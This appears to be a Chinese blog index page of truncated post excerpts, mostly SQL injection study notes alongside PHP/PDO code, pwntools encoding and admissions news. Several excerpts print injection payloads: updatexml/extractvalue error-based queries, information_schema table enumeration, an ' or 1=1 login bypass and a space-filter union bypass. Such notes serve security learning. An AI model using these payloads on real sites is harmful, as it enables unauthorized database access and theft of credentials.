摘要： pwntools：类型转换 编码是什么？编码就是把一个字符用一个二进制来表示。 以ASCII编码为例，它规定1个字节8个比特位代表1个字符的编码，也就是"00000000"这么宽，一个一个字节的解读。例如：01000001表示大写字母A，有时我们会“偷懒"的用65这个十进制来表示A在ASCII中的编 阅读全文

摘要： 西南交通大学 信息科学与技术学院2024年硕士研究生拟录取名单（不含联合培养专项https://sist.swjtu.edu.cn/attached/2024/03/29/9dbec4e4-20a7-4da5-8f22-568a5a3445a3.pdf 全国网络空间安全专业大学排名榜（2024年最新 阅读全文

摘要： <?php namespace app\controller; use app\BaseController; use think\facade\Db; class Index extends BaseController { public function index13(){ #$query=D 阅读全文

摘要： <?php $dsn = "mysql:dbname=phpblog;host=127.0.0.1"; # $PDO为 pdo基类的实例 $pdo = new PDO($dsn,'root','root'); #1.如果不根据用户传过来的值进行操作,可以直接query sql $sql = "sel 阅读全文

摘要： 1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)# 1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) # SQL注入实战之报错注入篇（u 阅读全文

摘要： select group_concat(table_name) from information_schema.tables where table_schema=database(); ## 查看表名 ## student, user, passwd select group_concat(col 阅读全文

摘要： #1.万能注入 'or 1=1 -- '#select * from users where username=' ' or 1=1 -- 'and password='admin4' #一·数字型注入判断#1.?id=1'#select * from users where id=1';数字型则报 阅读全文

摘要： 这个报错通常是因为在 UPDATE 语句中使用了子查询，并且子查询中引用了待更新的目标表（例如 'users' 表）。这会导致 MySQL 报错，因为 MySQL 不允许在子查询中直接引用待更新的目标表，以防止出现不确定的结果。 以下是一个示例和可能的报错原因： sql -- 尝试更新 'users 阅读全文

摘要： #1.万能注入 'or 1=1 -- '#select * from users where username=' ' or 1=1 -- 'and password='admin4' #一·数字型注入判断#1.?id=1'#select * from users where id=1';数字型则报 阅读全文

摘要： use security;#()绕过空格，查表#way1:union子查询select id,username,password from users where id=1 or 1=1 union(select 2,(select (group_concat(table_name))from(in 阅读全文